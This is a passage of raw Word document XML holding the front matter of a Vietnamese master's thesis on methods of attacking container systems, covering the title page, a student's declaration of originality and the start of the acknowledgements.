            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="17244243" w14:textId="4689A4D3" w:rsidR="00B64A44" w:rsidRPr="00B64A44" w:rsidRDefault="002052C6" w:rsidP="00B64A44">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD11E6">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">NGHIÊN CỨU PHƯƠNG </w:t>
            </w:r>
            <w:r w:rsidR="00824775">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>THỨC TẤN CÔNG VÀO HỆ THỐNG CONTAINER</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705F03FD" w14:textId="1F218ABF" w:rsidR="00B64A44" w:rsidRPr="00B64A44" w:rsidRDefault="00B64A44" w:rsidP="00B64A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="001C295D" w14:paraId="3FB26B5A" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblInd w:w="15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9"/>
              <w:gridCol w:w="3614"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AF3C80" w14:paraId="17A2AFDB" w14:textId="77777777" w:rsidTr="00220D25">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3049" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="03DD8879" w14:textId="61542D0A" w:rsidR="00AF3C80" w:rsidRPr="00220D25" w:rsidRDefault="00AF3C80">
                  <w:pPr>
                    <w:spacing w:before="60"/>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00220D25">
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>CHUYÊN NGÀNH:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3614" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="64C93FD5" w14:textId="392242F7" w:rsidR="00AF3C80" w:rsidRPr="00220D25" w:rsidRDefault="00AF3C80">
                  <w:pPr>
                    <w:spacing w:before="60"/>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00220D25">
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>KHOA HỌC MÁY TÍNH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00AF3C80" w14:paraId="7C9247A3" w14:textId="77777777" w:rsidTr="00220D25">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3049" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="574114D0" w14:textId="5548091E" w:rsidR="00AF3C80" w:rsidRPr="00220D25" w:rsidRDefault="00AF3C80">
                  <w:pPr>
                    <w:spacing w:before="60"/>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00220D25">
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>MÃ SỐ:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3614" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="76C84880" w14:textId="37D7B76F" w:rsidR="00AF3C80" w:rsidRPr="00220D25" w:rsidRDefault="00AF3C80">
                  <w:pPr>
                    <w:spacing w:before="60"/>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00220D25">
                    <w:rPr>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>8.48.01.01</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0B0AFDAC" w14:textId="77777777" w:rsidR="00B64A44" w:rsidRPr="00B64A44" w:rsidRDefault="00B64A44" w:rsidP="00B64A44">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00841FE2" w14:paraId="5BAA9754" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1073C346" w14:textId="77777777" w:rsidR="00507492" w:rsidRPr="00551E81" w:rsidRDefault="00507492" w:rsidP="00B64A44">
            <w:pPr>
              <w:spacing w:before="140" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38A74E69" w14:textId="77777777" w:rsidR="00E96BDF" w:rsidRPr="00E96BDF" w:rsidRDefault="00E96BDF" w:rsidP="00507492">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E96BDF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ĐỀ ÁN TỐT NGHIỆP THẠC SĨ KỸ THUẬT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E64CDD" w14:textId="339A11BD" w:rsidR="002052C6" w:rsidRPr="00507492" w:rsidRDefault="002052C6" w:rsidP="00507492">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00622089">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Theo định hướng ứng dụng)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C1F8058" w14:textId="15292A19" w:rsidR="002052C6" w:rsidRPr="003B15FC" w:rsidRDefault="002052C6" w:rsidP="00507492">
            <w:pPr>
              <w:spacing w:before="140" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F8B8371" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="003B15FC" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B15FC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>NGƯỜI HƯỚNG DẪN KHOA HỌC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D70369" w14:textId="0CE18958" w:rsidR="00B64A44" w:rsidRPr="00B64A44" w:rsidRDefault="002052C6" w:rsidP="00B64A44">
            <w:pPr>
              <w:spacing w:before="140" w:line="480" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B15FC">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>PGS.TS.</w:t>
            </w:r>
            <w:r w:rsidR="00771EDA">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003B15FC">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>Đỗ Xuân Chợ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00621B5F" w14:paraId="4F12E055" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="892"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A7C5698" w14:textId="16AEAF59" w:rsidR="00B64A44" w:rsidRPr="00B64A44" w:rsidRDefault="00507492" w:rsidP="00B64A44">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002052C6">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">HÀ NỘI </w:t>
            </w:r>
            <w:r w:rsidR="00B64A44">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="002052C6">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 202</w:t>
            </w:r>
            <w:r w:rsidR="00E96BDF">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55693331" w14:textId="435EA140" w:rsidR="00B64A44" w:rsidRDefault="00B64A44">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8DE7F3" w14:textId="25FF7CF3" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LỜI CAM ĐOAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E083F28" w14:textId="002FEDC7" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05EEE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Học viên</w:t>
      </w:r>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nguyễn Tuấn Anh</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05EEE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>, mã học viên B</w:t>
      </w:r>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>23CHCS001</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05EEE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xin cam đoan đề án tốt nghiệp là công trình nghiên cứu của riêng học viên dưới sự hướng dẫn của PGS.TS </w:t>
      </w:r>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Đỗ Xuân Chợ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05EEE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>. Tất cả những tham khảo trong đề án tốt nghiệp bao gồm hình ảnh, bảng biểu, số hiệu và các câu từ trích dẫn đều được ghi rõ ràng và đầy đủ nguồn gốc trong danh mục tài liệu tham khảo</w:t>
      </w:r>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>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390"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E38B5" w14:paraId="0D07B7E5" w14:textId="77777777" w:rsidTr="007E38B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="564CFD26" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B8873B5" w14:textId="3AF92665" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Hà Nội, ngày </w:t>
            </w:r>
            <w:r w:rsidRPr="000A54C5">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> tháng 05 năm 202</w:t>
            </w:r>
            <w:r w:rsidRPr="000A54C5">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34951087" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51497736" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E38B5">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tác giả đề án tốt nghiệp ký và ghi rõ họ tên</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B44A76" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2233043D" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D05E9C9" w14:textId="5BDB91FA" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6070C384" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="000A54C5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47234A9C" w14:textId="01346274" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nguyễn Tuấn Anh-B23CHCS001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62986FD9" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="247BEE29" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D569360" w14:textId="6D597F18" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A59346" w14:textId="77777777" w:rsidR="00B64A44" w:rsidRDefault="00B64A44">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67942166" w14:textId="77777777" w:rsidR="00590974" w:rsidRDefault="00590974" w:rsidP="007E38B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00590974" w:rsidSect="00590974">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:headerReference w:type="first" r:id="rId10"/>
          <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
          <w:pgMar w:top="1985" w:right="1134" w:bottom="1701" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258F4ACA" w14:textId="3D821D29" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LỜI CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534E221" w14:textId="482EB19C" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Em xin chân thành cảm ơn giảng viên hướng dẫn PGS.TS. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đỗ Xuân Chợ</w:t>
      </w:r>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã giúp đỡ và định hướng cho em trong suốt quá trình học tập và thực hiện đề án tốt nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D3CF0C" w14:textId="394061C5" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Dưới sự hướng dẫn của PGS.TS. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đỗ Xuân Chợ</w:t>
      </w:r>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, em đã cố gắng hoàn thành tốt nhất có thể đề án tốt nghiệp này, tuy nhiên trong quá trình thực hiện không thể tránh được những thiếu sót, em rất mong nhận được sự góp ý của các thầy/cô trong hội đồng để em hoàn thiện hơn đề án tốt nghiệp này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE7768" w14:textId="3F8CEF2F" w:rsidR="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E38B5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Em xin chân thành cảm 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390"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E38B5" w:rsidRPr="007E38B5" w14:paraId="27B5A3D1" w14:textId="77777777" w:rsidTr="00F133F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45CBD0C2" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="569EAF5C" w14:textId="41AEF3C7" w:rsidR="007E38B5" w:rsidRPr="00F133F0" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
